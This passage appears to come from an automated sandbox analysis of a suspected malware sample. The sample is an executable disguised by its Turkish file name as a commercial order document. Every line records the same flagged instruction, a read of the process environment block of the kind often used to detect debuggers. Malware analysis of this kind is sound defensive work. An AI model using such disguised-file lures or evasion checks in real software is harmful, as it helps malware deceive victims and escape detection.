Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01286420 mov eax, dword ptr fs:[00000030h]	6_2_01286420
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01286420 mov eax, dword ptr fs:[00000030h]	6_2_01286420
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01286420 mov eax, dword ptr fs:[00000030h]	6_2_01286420
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01286420 mov eax, dword ptr fs:[00000030h]	6_2_01286420
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01286420 mov eax, dword ptr fs:[00000030h]	6_2_01286420
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123A430 mov eax, dword ptr fs:[00000030h]	6_2_0123A430
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01238402 mov eax, dword ptr fs:[00000030h]	6_2_01238402
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01238402 mov eax, dword ptr fs:[00000030h]	6_2_01238402
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01238402 mov eax, dword ptr fs:[00000030h]	6_2_01238402
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FC427 mov eax, dword ptr fs:[00000030h]	6_2_011FC427
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FE420 mov eax, dword ptr fs:[00000030h]	6_2_011FE420
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FE420 mov eax, dword ptr fs:[00000030h]	6_2_011FE420
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011FE420 mov eax, dword ptr fs:[00000030h]	6_2_011FE420
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011F645D mov eax, dword ptr fs:[00000030h]	6_2_011F645D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128C460 mov ecx, dword ptr fs:[00000030h]	6_2_0128C460
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122A470 mov eax, dword ptr fs:[00000030h]	6_2_0122A470
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122A470 mov eax, dword ptr fs:[00000030h]	6_2_0122A470
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122A470 mov eax, dword ptr fs:[00000030h]	6_2_0122A470
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123E443 mov eax, dword ptr fs:[00000030h]	6_2_0123E443
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123E443 mov eax, dword ptr fs:[00000030h]	6_2_0123E443
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123E443 mov eax, dword ptr fs:[00000030h]	6_2_0123E443
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123E443 mov eax, dword ptr fs:[00000030h]	6_2_0123E443
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123E443 mov eax, dword ptr fs:[00000030h]	6_2_0123E443
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123E443 mov eax, dword ptr fs:[00000030h]	6_2_0123E443
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123E443 mov eax, dword ptr fs:[00000030h]	6_2_0123E443
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123E443 mov eax, dword ptr fs:[00000030h]	6_2_0123E443
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0122245A mov eax, dword ptr fs:[00000030h]	6_2_0122245A
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012BA456 mov eax, dword ptr fs:[00000030h]	6_2_012BA456
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012064AB mov eax, dword ptr fs:[00000030h]	6_2_012064AB
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012344B0 mov ecx, dword ptr fs:[00000030h]	6_2_012344B0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128A4B0 mov eax, dword ptr fs:[00000030h]	6_2_0128A4B0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012BA49A mov eax, dword ptr fs:[00000030h]	6_2_012BA49A
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012004E5 mov ecx, dword ptr fs:[00000030h]	6_2_012004E5
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123C720 mov eax, dword ptr fs:[00000030h]	6_2_0123C720
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123C720 mov eax, dword ptr fs:[00000030h]	6_2_0123C720
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127C730 mov eax, dword ptr fs:[00000030h]	6_2_0127C730
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123273C mov eax, dword ptr fs:[00000030h]	6_2_0123273C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123273C mov ecx, dword ptr fs:[00000030h]	6_2_0123273C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123273C mov eax, dword ptr fs:[00000030h]	6_2_0123273C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123C700 mov eax, dword ptr fs:[00000030h]	6_2_0123C700
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01200710 mov eax, dword ptr fs:[00000030h]	6_2_01200710
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01230710 mov eax, dword ptr fs:[00000030h]	6_2_01230710
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01208770 mov eax, dword ptr fs:[00000030h]	6_2_01208770
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210770 mov eax, dword ptr fs:[00000030h]	6_2_01210770
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210770 mov eax, dword ptr fs:[00000030h]	6_2_01210770
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210770 mov eax, dword ptr fs:[00000030h]	6_2_01210770
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210770 mov eax, dword ptr fs:[00000030h]	6_2_01210770
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210770 mov eax, dword ptr fs:[00000030h]	6_2_01210770
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210770 mov eax, dword ptr fs:[00000030h]	6_2_01210770
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210770 mov eax, dword ptr fs:[00000030h]	6_2_01210770
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210770 mov eax, dword ptr fs:[00000030h]	6_2_01210770
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210770 mov eax, dword ptr fs:[00000030h]	6_2_01210770
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210770 mov eax, dword ptr fs:[00000030h]	6_2_01210770
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210770 mov eax, dword ptr fs:[00000030h]	6_2_01210770
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01210770 mov eax, dword ptr fs:[00000030h]	6_2_01210770
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123674D mov esi, dword ptr fs:[00000030h]	6_2_0123674D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123674D mov eax, dword ptr fs:[00000030h]	6_2_0123674D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123674D mov eax, dword ptr fs:[00000030h]	6_2_0123674D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01200750 mov eax, dword ptr fs:[00000030h]	6_2_01200750
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242750 mov eax, dword ptr fs:[00000030h]	6_2_01242750
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242750 mov eax, dword ptr fs:[00000030h]	6_2_01242750
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128E75D mov eax, dword ptr fs:[00000030h]	6_2_0128E75D
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01284755 mov eax, dword ptr fs:[00000030h]	6_2_01284755
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012B47A0 mov eax, dword ptr fs:[00000030h]	6_2_012B47A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012007AF mov eax, dword ptr fs:[00000030h]	6_2_012007AF
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A678E mov eax, dword ptr fs:[00000030h]	6_2_012A678E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128E7E1 mov eax, dword ptr fs:[00000030h]	6_2_0128E7E1
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012227ED mov eax, dword ptr fs:[00000030h]	6_2_012227ED
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012227ED mov eax, dword ptr fs:[00000030h]	6_2_012227ED
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012227ED mov eax, dword ptr fs:[00000030h]	6_2_012227ED
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012047FB mov eax, dword ptr fs:[00000030h]	6_2_012047FB
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012047FB mov eax, dword ptr fs:[00000030h]	6_2_012047FB
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120C7C0 mov eax, dword ptr fs:[00000030h]	6_2_0120C7C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012807C3 mov eax, dword ptr fs:[00000030h]	6_2_012807C3
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01236620 mov eax, dword ptr fs:[00000030h]	6_2_01236620
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01238620 mov eax, dword ptr fs:[00000030h]	6_2_01238620
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121E627 mov eax, dword ptr fs:[00000030h]	6_2_0121E627
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120262C mov eax, dword ptr fs:[00000030h]	6_2_0120262C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121260B mov eax, dword ptr fs:[00000030h]	6_2_0121260B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121260B mov eax, dword ptr fs:[00000030h]	6_2_0121260B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121260B mov eax, dword ptr fs:[00000030h]	6_2_0121260B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121260B mov eax, dword ptr fs:[00000030h]	6_2_0121260B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121260B mov eax, dword ptr fs:[00000030h]	6_2_0121260B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121260B mov eax, dword ptr fs:[00000030h]	6_2_0121260B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121260B mov eax, dword ptr fs:[00000030h]	6_2_0121260B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127E609 mov eax, dword ptr fs:[00000030h]	6_2_0127E609
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242619 mov eax, dword ptr fs:[00000030h]	6_2_01242619
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C866E mov eax, dword ptr fs:[00000030h]	6_2_012C866E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012C866E mov eax, dword ptr fs:[00000030h]	6_2_012C866E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123A660 mov eax, dword ptr fs:[00000030h]	6_2_0123A660
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123A660 mov eax, dword ptr fs:[00000030h]	6_2_0123A660
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01232674 mov eax, dword ptr fs:[00000030h]	6_2_01232674
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0121C640 mov eax, dword ptr fs:[00000030h]	6_2_0121C640
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123C6A6 mov eax, dword ptr fs:[00000030h]	6_2_0123C6A6
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012366B0 mov eax, dword ptr fs:[00000030h]	6_2_012366B0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01204690 mov eax, dword ptr fs:[00000030h]	6_2_01204690
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01204690 mov eax, dword ptr fs:[00000030h]	6_2_01204690
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127E6F2 mov eax, dword ptr fs:[00000030h]	6_2_0127E6F2
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127E6F2 mov eax, dword ptr fs:[00000030h]	6_2_0127E6F2
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127E6F2 mov eax, dword ptr fs:[00000030h]	6_2_0127E6F2
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127E6F2 mov eax, dword ptr fs:[00000030h]	6_2_0127E6F2
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012806F1 mov eax, dword ptr fs:[00000030h]	6_2_012806F1
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012806F1 mov eax, dword ptr fs:[00000030h]	6_2_012806F1
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123A6C7 mov ebx, dword ptr fs:[00000030h]	6_2_0123A6C7
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123A6C7 mov eax, dword ptr fs:[00000030h]	6_2_0123A6C7
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128892A mov eax, dword ptr fs:[00000030h]	6_2_0128892A
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0129892B mov eax, dword ptr fs:[00000030h]	6_2_0129892B
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011F8918 mov eax, dword ptr fs:[00000030h]	6_2_011F8918
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_011F8918 mov eax, dword ptr fs:[00000030h]	6_2_011F8918
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127E908 mov eax, dword ptr fs:[00000030h]	6_2_0127E908
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0127E908 mov eax, dword ptr fs:[00000030h]	6_2_0127E908
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128C912 mov eax, dword ptr fs:[00000030h]	6_2_0128C912
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01226962 mov eax, dword ptr fs:[00000030h]	6_2_01226962
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01226962 mov eax, dword ptr fs:[00000030h]	6_2_01226962
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01226962 mov eax, dword ptr fs:[00000030h]	6_2_01226962
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0124096E mov eax, dword ptr fs:[00000030h]	6_2_0124096E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0124096E mov edx, dword ptr fs:[00000030h]	6_2_0124096E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0124096E mov eax, dword ptr fs:[00000030h]	6_2_0124096E
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A4978 mov eax, dword ptr fs:[00000030h]	6_2_012A4978
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A4978 mov eax, dword ptr fs:[00000030h]	6_2_012A4978
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128C97C mov eax, dword ptr fs:[00000030h]	6_2_0128C97C
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012D4940 mov eax, dword ptr fs:[00000030h]	6_2_012D4940
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01280946 mov eax, dword ptr fs:[00000030h]	6_2_01280946
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012129A0 mov eax, dword ptr fs:[00000030h]	6_2_012129A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012129A0 mov eax, dword ptr fs:[00000030h]	6_2_012129A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012129A0 mov eax, dword ptr fs:[00000030h]	6_2_012129A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012129A0 mov eax, dword ptr fs:[00000030h]	6_2_012129A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012129A0 mov eax, dword ptr fs:[00000030h]	6_2_012129A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012129A0 mov eax, dword ptr fs:[00000030h]	6_2_012129A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012129A0 mov eax, dword ptr fs:[00000030h]	6_2_012129A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012129A0 mov eax, dword ptr fs:[00000030h]	6_2_012129A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012129A0 mov eax, dword ptr fs:[00000030h]	6_2_012129A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012129A0 mov eax, dword ptr fs:[00000030h]	6_2_012129A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012129A0 mov eax, dword ptr fs:[00000030h]	6_2_012129A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012129A0 mov eax, dword ptr fs:[00000030h]	6_2_012129A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012129A0 mov eax, dword ptr fs:[00000030h]	6_2_012129A0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012009AD mov eax, dword ptr fs:[00000030h]	6_2_012009AD
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012009AD mov eax, dword ptr fs:[00000030h]	6_2_012009AD
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012889B3 mov esi, dword ptr fs:[00000030h]	6_2_012889B3
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012889B3 mov eax, dword ptr fs:[00000030h]	6_2_012889B3
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012889B3 mov eax, dword ptr fs:[00000030h]	6_2_012889B3
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128E9E0 mov eax, dword ptr fs:[00000030h]	6_2_0128E9E0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012329F9 mov eax, dword ptr fs:[00000030h]	6_2_012329F9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012329F9 mov eax, dword ptr fs:[00000030h]	6_2_012329F9
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012969C0 mov eax, dword ptr fs:[00000030h]	6_2_012969C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0120A9D0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0120A9D0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0120A9D0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0120A9D0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0120A9D0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0120A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0120A9D0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012349D0 mov eax, dword ptr fs:[00000030h]	6_2_012349D0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012CA9D3 mov eax, dword ptr fs:[00000030h]	6_2_012CA9D3
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A483A mov eax, dword ptr fs:[00000030h]	6_2_012A483A
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012A483A mov eax, dword ptr fs:[00000030h]	6_2_012A483A
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0123A830 mov eax, dword ptr fs:[00000030h]	6_2_0123A830
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01222835 mov eax, dword ptr fs:[00000030h]	6_2_01222835
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01222835 mov eax, dword ptr fs:[00000030h]	6_2_01222835
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01222835 mov eax, dword ptr fs:[00000030h]	6_2_01222835
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01222835 mov ecx, dword ptr fs:[00000030h]	6_2_01222835
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01222835 mov eax, dword ptr fs:[00000030h]	6_2_01222835
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01222835 mov eax, dword ptr fs:[00000030h]	6_2_01222835
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128C810 mov eax, dword ptr fs:[00000030h]	6_2_0128C810
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01296870 mov eax, dword ptr fs:[00000030h]	6_2_01296870
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01296870 mov eax, dword ptr fs:[00000030h]	6_2_01296870
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128E872 mov eax, dword ptr fs:[00000030h]	6_2_0128E872
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0128E872 mov eax, dword ptr fs:[00000030h]	6_2_0128E872
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01212840 mov ecx, dword ptr fs:[00000030h]	6_2_01212840
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01230854 mov eax, dword ptr fs:[00000030h]	6_2_01230854
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01204859 mov eax, dword ptr fs:[00000030h]	6_2_01204859
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01204859 mov eax, dword ptr fs:[00000030h]	6_2_01204859
